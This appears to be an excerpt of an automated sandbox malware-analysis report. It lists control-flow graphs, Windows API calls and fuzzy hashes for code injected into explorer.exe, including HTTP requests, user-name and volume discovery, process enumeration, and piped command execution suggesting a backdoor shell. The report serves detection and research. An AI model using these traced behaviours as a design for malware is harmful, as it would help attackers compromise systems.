control_flow_graph 107 2be5160-2be51c7 call 2beb388 call 2beb4cc 112 2be51d8-2be51e0 107->112 113 2be51c9-2be51d6 107->113 114 2be51e5-2be520d call 2bebe64 112->114 113->114 117 2be520f-2be5226 call 2beb4cc 114->117 118 2be5265-2be5275 114->118 127 2be5228-2be5235 117->127 128 2be5237-2be523f 117->128 120 2be5277-2be5280 118->120 121 2be5284-2be528c 118->121 120->121 122 2be5315-2be532c call 2beb4cc 121->122 123 2be5292-2be52a9 call 2beb4cc 121->123 132 2be532e-2be533e 122->132 133 2be5340-2be5348 122->133 135 2be52ba-2be52c2 123->135 136 2be52ab-2be52b8 123->136 130 2be5244-2be525b call 2bebe64 127->130 128->130 130->118 141 2be5260 call 2bebe64 130->141 137 2be5350-2be5397 HttpOpenRequestA 132->137 133->137 139 2be52c7-2be5310 HttpOpenRequestA 135->139 136->139 140 2be539c-2be53a2 137->140 139->140 142 2be53a9-2be53b1 140->142 143 2be53a4 140->143 141->118 144 2be53d6-2be53de 142->144 145 2be53b3-2be53d0 InternetSetOptionA 142->145 146 2be5467-2be546d 143->146 147 2be5424-2be543f HttpSendRequestA 144->147 148 2be53e0-2be5422 call 2bec0fc * 2 HttpSendRequestA 144->148 145->144 149 2be546f-2be5474 call 2be82b4 146->149 150 2be5479 146->150 154 2be5443-2be5448 147->154 148->154 149->150 153 2be547b-2be5482 150->153 156 2be544c-2be545b call 2be82b4 154->156 157 2be544a 154->157 156->146 156->153 157->146
APIs
  • Part of subcall function 02BEB388: NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
• HttpOpenRequestA.WININET ref: 02BE5305
• HttpOpenRequestA.WININET ref: 02BE5391
• InternetSetOptionA.WININET ref: 02BE53D0
• HttpSendRequestA.WININET ref: 02BE5418
• HttpSendRequestA.WININET ref: 02BE5439
  • Part of subcall function 02BE82B4: NtFreeVirtualMemory.NTDLL ref: 02BE82E5
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
• String ID:
• API String ID: 2140924187-0
• Opcode ID: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
• Instruction ID: 044c56f8f944a19cee9477a8d77ec72e4329c0af4abecb3acc50653c5ea0c7b5
• Opcode Fuzzy Hash: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
• Instruction Fuzzy Hash: 2071B572209BC486DB70DB14F48479AB7B1F788798F944126EACA42B69DF7DC584CF40

Control-flow Graph
control_flow_graph 174 2be8d3c-2be8d6c call 2beb470 GetUserNameA 177 2be8d6e-2be8d81 wsprintfA 174->177 178 2be8d87-2be8d95 174->178 177->178
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: NameUserwsprintf
• String ID: hubert
• API String ID: 54179028-4043692857
• Opcode ID: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
• Instruction ID: f665dd84ca01a7b027052cb9544200b93fd5934fafe888b21506bb2c6bac32bf
• Opcode Fuzzy Hash: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
• Instruction Fuzzy Hash: 14F07D71225A8792EF60EF14EC943E97325FB90748FC15176A14E46969EF7CC60ECB40

Control-flow Graph
control_flow_graph 211 2be8c30-2be8c7b call 2beb470 * 2 FindFirstVolumeW 216 2be8c7d-2be8c7f 211->216 217 2be8c81-2be8cd8 GetVolumeInformationW FindVolumeClose 211->217 218 2be8ce5-2be8cec 216->218 219 2be8cda-2be8ce1 217->219 220 2be8ce3 217->220 219->218 220->218
APIs
• FindFirstVolumeW.KERNEL32 ref: 02BE8C6A
• GetVolumeInformationW.KERNEL32 ref: 02BE8CBE
• FindVolumeClose.KERNEL32 ref: 02BE8CCD
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: Volume$Find$CloseFirstInformation
• String ID:
• API String ID: 586543143-0
• Opcode ID: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
• Instruction ID: fbe082a51d7a7f15badd3a0a9d902d23202994b30450f53f0a391fe2fbd34fb3
• Opcode Fuzzy Hash: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
• Instruction Fuzzy Hash: AC11E872619A40D7DB60DB10F88839BB3B1F7C5364F904626E2AA42BB8DF7CC559CB40

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: HttpOpenRequest
• String ID:
• API String ID: 1984915467-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• CreatePipe.KERNEL32 ref: 02BE2233
• SetHandleInformation.KERNEL32 ref: 02BE224D
• CreatePipe.KERNEL32 ref: 02BE226E
• SetHandleInformation.KERNEL32 ref: 02BE2288
• CreatePipe.KERNEL32 ref: 02BE22A9
• SetHandleInformation.KERNEL32 ref: 02BE22C3
• CreateProcessW.KERNEL32 ref: 02BE2385
  • Part of subcall function 02BEB388: NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
• PeekNamedPipe.KERNEL32 ref: 02BE2434
• ReadFile.KERNEL32 ref: 02BE2490
• PeekNamedPipe.KERNEL32 ref: 02BE24E4
• ReadFile.KERNEL32 ref: 02BE2540
• GetExitCodeProcess.KERNEL32 ref: 02BE2579
• TerminateProcess.KERNEL32 ref: 02BE25AA
• CloseHandle.KERNEL32 ref: 02BE25B8
  • Part of subcall function 02BEC704: NtDelayExecution.NTDLL ref: 02BEC726
• CloseHandle.KERNEL32 ref: 02BE25C6
• CloseHandle.KERNEL32 ref: 02BE25D4
• CloseHandle.KERNEL32 ref: 02BE25E2
  • Part of subcall function 02BE82B4: NtFreeVirtualMemory.NTDLL ref: 02BE82E5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
• String ID: h
• API String ID: 30365702-2439710439
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: CreateFileInitStringUnicode
• String ID: 0$@
• API String ID: 2498367268-1545510068
APIs
  • Part of subcall function 02BEB388: NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
• FindFirstFileA.KERNEL32 ref: 02BE2BE7
• wsprintfA.USER32 ref: 02BE2CAD
• FindNextFileA.KERNEL32 ref: 02BE2CDA
• FindClose.KERNEL32 ref: 02BE2CED
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
• String ID:
• API String ID: 65906682-0
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: Internet$CloseHandle$ConnectHttpOpenRequest
• String ID: GET
• API String ID: 830097650-1805413626
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
• String ID:
• API String ID: 3605396869-0
                                                                                                                                                            • Opcode ID: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                                            • Instruction ID: 3e0d71e45e289fd66698af735b1082e2539bd4b85c67fda2d55bf6e166b52a93
                                                                                                                                                            • Opcode Fuzzy Hash: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                                            • Instruction Fuzzy Hash: 5AC1E832209B8595DE60DB14E49039AB3B5FB88798F844566DACE43B6CEF3CC549CF41
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 1610889594-2766056989
                                                                                                                                                            • Opcode ID: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                            • Instruction ID: 65d12f8df3c6a80c74754bae3b6803c4acbb22df082826364e20ecdb2884784d
                                                                                                                                                            • Opcode Fuzzy Hash: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                            • Instruction Fuzzy Hash: CC41D536219B8582DFA0DB25E88476EB7A1F7C4B98F405565EA8F83B68DF3CC444CB40
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 1610889594-2766056989
                                                                                                                                                            • Opcode ID: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                                            • Instruction ID: 4b4e02bbcca261911dbbe494800b84d25aa48deb43470b64b01bab06048ed394
                                                                                                                                                            • Opcode Fuzzy Hash: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                                            • Instruction Fuzzy Hash: DC312D76218F8486DBA0DB15F98475AB7A0F7C8794F505622EA9F43BA8CF7CC484CB00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4137211488-0
                                                                                                                                                            • Opcode ID: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                                            • Instruction ID: 682059703bd158f74f91d3f922e0e6fd8f2aa600956fc836e2c2600acde4ab15
                                                                                                                                                            • Opcode Fuzzy Hash: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                                            • Instruction Fuzzy Hash: EC810836219B81D6DE60DB14E48439AB3A9FB88794F941666DB8E43B7CEF38C505CF40
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Internet$CloseHandle$Open
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2762225225-0
                                                                                                                                                            • Opcode ID: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                            • Instruction ID: 336fadec57c3c2d720c4e287f0e268ef3f65cd5b67c05e342913052bab01938e
                                                                                                                                                            • Opcode Fuzzy Hash: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                            • Instruction Fuzzy Hash: AD51E072218A8086DB60CB59E49875EB7A0F7C5798F401026EBCA83B68DF7DC488CF01
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandlewsprintf$CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2803068115-0
                                                                                                                                                            • Opcode ID: b18e833e66d955f35563fdfa70050700d38f2023f4f5055f34abfc6722212c5f
                                                                                                                                                            • Instruction ID: 5815b6ef6544d3e3acfc6309bffb8b57a77e87c7c4e11679501969e2c5c6ae5b
                                                                                                                                                            • Opcode Fuzzy Hash: b18e833e66d955f35563fdfa70050700d38f2023f4f5055f34abfc6722212c5f
                                                                                                                                                            • Instruction Fuzzy Hash: 3C41E572209B8596DB60DB14E4843ABB7A1F7C8388F404526D6CA82A68EF7CC559CF40